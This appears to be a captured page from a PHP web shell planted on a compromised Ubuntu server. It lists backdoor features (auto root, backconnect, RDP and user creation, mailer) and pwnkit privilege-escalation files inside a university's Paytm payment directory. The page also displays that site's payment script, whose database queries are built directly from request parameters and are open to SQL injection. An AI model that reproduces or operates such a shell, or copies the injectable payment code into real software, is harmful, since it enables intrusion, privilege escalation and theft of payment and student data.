Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.15.113.71
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phdadm /
Paytm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxrwxrwx
.Paytm.php
3.61
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
CHECK_TxnStatuss.php
1.53
KB
-rwxrwxrwx
TxnStatus.php
2.11
KB
-rwxrwxrwx
TxnTest.php
1.75
KB
-rwxrwxrwx
pgRedirect.php
6.56
KB
-rwxrwxrwx
pgRedirect_29112019.php
3.85
KB
-rwxrwxrwx
pgResponse.php
10.48
KB
-rwxrwxrwx
pgResponse_new.php
3.73
KB
-rwxrwxrwx
pgResponse_old.php
2.09
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgRedirect.php
<?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); include("/var/www/config.php"); $checkSum = ""; $paramList = array(); $checkSum = ""; $paramList = array(); $appno = $_REQUEST['productinfo']; $fregno = $_REQUEST['fregno']; $funivcode = $_REQUEST['funivcode']; $fdigi = substr($appno,0,1); $type = ""; $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $databse = 'logisys3_comexam'; //$servername = "192.168.0.32"; //$username = "admin"; //$password = "admin"; //$databse = 'logisys3_comexam'; if($fdigi == '1'){ $type = 'EXAM'; } else if($fdigi == '9'){ $type = 'PHDADM'; } $conn = new mysqli($servername,$username,$password,$databse); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $get_data = "select * from dbname where funivcode ='{$funivcode}'"; $result1=$conn->query($get_data); if (mysqli_num_rows($result1) > 0) { $dbnames = array(); $uniname = ""; while($row = mysqli_fetch_assoc($result1)) { $dbnames[$row['FUNIVCODE']] = $row['FDBNAME']; $uniname = $row['FUNIVNAME']; } } $get_data = "select * from {$dbnames[$funivcode]}.maspg where fbank = 'Paytm' and FENTTYPE = '$type' and funivcode = '{$funivcode}'"; //var_dump($get_data); $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { while($row = mysqli_fetch_assoc($result)) { $key = $row['fkey']; $mid = $row['fmid']; $fworkingid = $row['fworkingid']; $fmode = $row['fmode']; $freturnurl = $row['freturnurl']; $findtype = $row['findtype']; //EducationGovernment } } //define('PAYTM_ENVIRONMENT', $fmode); // PROD define('PAYTM_MERCHANT_KEY', $key); //Change this constant's value with Merchant key downloaded from portal define('PAYTM_MERCHANT_MID', $mid); //Change this constant's value with MID (Merchant ID) received from Paytm define('PAYTM_MERCHANT_WEBSITE', $fworkingid); //Change this constant's value with Website name received from Paytm $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = $dbnames[$funivcode]; $conn = new mysqli($servername, $username, $password, $dbname); $number = (int)date("Ymds").rand(10000000,99999999); if($type == 'EXAM') { $get_data = "select fregno,ftotalfee,fdegree,fcollcode,fyear,fexamtype from appcandsum where appno = '{$appno}'"; $query = "update appcandsum set forderid = '{$number}', FPAYGATEWAY = 'Paytm', FPAYMENTYPE = 'Paytm' where appno = '{$appno}'"; $result1 =$conn->query($query); }else if($type == 'RVRT') { $get_data = "select cs.fregno as fregno, IFNULL(cs.FTOTAL,0) as ftotalfee, control.funivname,pdf_logo_path, '999999999' as fmobileno ,'99999' as fname,'999999@gmail.com' as femail,cs.fdegree,cs.fcollcode,cs.fyear,cs.fexamtype from control, res_stud cs inner join college c on cs.fcollcode = c.fcollcode where appno = '{$appno}'"; $query = "update res_stud set forderid = '{$number}', fpaymenttype = 'Paytm' where appno = '{$appno}'"; $result1 =$conn->query($query); }else if($type == 'OSER') { $get_data = "select FREGNO as fregno,FTOTAL as ftotalfee, fname, fmobile as fmobileno ,femail as femail,fdegree,fcollcode,'' as fyear,'' as fexamtype from servtran where FAPPNO = '{$appno}'"; $query = "update servtran set forderid = '{$number}', fpaymenttype = 'Paytm' where fappno = '{$appno}'"; $result1 =$conn->query($query); } else if($type == 'HOST') { //IFNULL(cs.fhostelamt,0) $get_data = "select cs.fregno as fregno, IFNULL(cs.fhostelamt,0) as ftotalfee,control.funivname,pdf_logo_path, cs.fmobileno as fmobileno ,cs.fname as fname, femail as femail, cs.fdegree, cs.fcollcode, '2021' as fyear, '2' as fexamtype from control, entstudadm s inner join entstudhostel cs on s.fappno = cs.fappno where cs.fhostalid = '{$appno}'"; $query = "update entstudhostel set fhosorderid = '{$number}', fpaymenttype = 'Paytm' where fhostalid = '{$appno}'"; $result1 =$conn->query($query); }else if($type == 'PHDADM') { $get_data = "select cs.fappno as fregno, IFNULL(cs.famount,0) as ftotalfee,control.funivname,pdf_logo_path, cs.fmobileno as fmobileno ,cs.fname as fname, femail as femail, cs.fphddeg as fdegree, 'PHD' as fcollcode, '2021' as fyear, '2' as fexamtype from control, phdstudadm cs where cs.fappno = '{$appno}'"; $query = "update phdstudadm set FORDERID = '{$number}', FPAYTYPE = 'Paytm' where fappno = '{$appno}'"; $result1 =$conn->query($query); } // var_dump($get_data); // die(); $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { $fregno = $row['fregno']; $ftotalfee = $row['ftotalfee']; $fdegree = $row['fdegree']; $fcollcode = $row['fcollcode']; $fyear = $row['fyear']; $fexamtype = $row['fexamtype']; } } $query = "insert into pgdet(ftype, appno, fappdate, fpaygateway, fregno, fdegree, fcollcode, famount, forderid, fyear, fexamtype, fcreatedate) values('{$type}', '{$appno}', current_date(), 'Paytm', '{$fregno}', '{$fdegree}', '{$fcollcode}', '{$ftotalfee}', '{$number}', '{$fyear}', '{$fexamtype}', now())"; // var_dump($query); $result1 =$conn->query($query); $ORDER_ID = $number; $CUST_ID = $fregno; $INDUSTRY_TYPE_ID = $findtype; //EducationGovernment $CHANNEL_ID = "WEB"; $TXN_AMOUNT = $ftotalfee; // Create an array having all required parameters for creating checksum. $paramList["MID"] = PAYTM_MERCHANT_MID; $paramList["ORDER_ID"] = $ORDER_ID; $paramList["CUST_ID"] = $CUST_ID; $paramList["MERC_UNQ_REF"] = $appno; $paramList["INDUSTRY_TYPE_ID"] = $INDUSTRY_TYPE_ID; $paramList["CHANNEL_ID"] = $CHANNEL_ID; $paramList["TXN_AMOUNT"] = $TXN_AMOUNT; $paramList["WEBSITE"] = PAYTM_MERCHANT_WEBSITE; $paramList["CALLBACK_URL"] = $freturnurl; //""; // var_dump($paramList); // die(); $checkSum = getChecksumFromArray($paramList,PAYTM_MERCHANT_KEY); ?> <html> <head> <title>Merchant Check Out Page</title> </head> <body> <center><h1>Please do not refresh this page...</h1></center> <form method="post" action="<?php echo PAYTM_TXN_URL ?>" name="f1"> <table border="1"> <tbody> <?php foreach($paramList as $name => $value) { echo '<input type="hidden" name="' . $name .'" value="' . $value . '">'; } ?> <input type="hidden" name="CHECKSUMHASH" value="<?php echo $checkSum ?>"> </tbody> </table> <script type="text/javascript"> document.f1.submit(); </script> </form> </body> </html>
Close
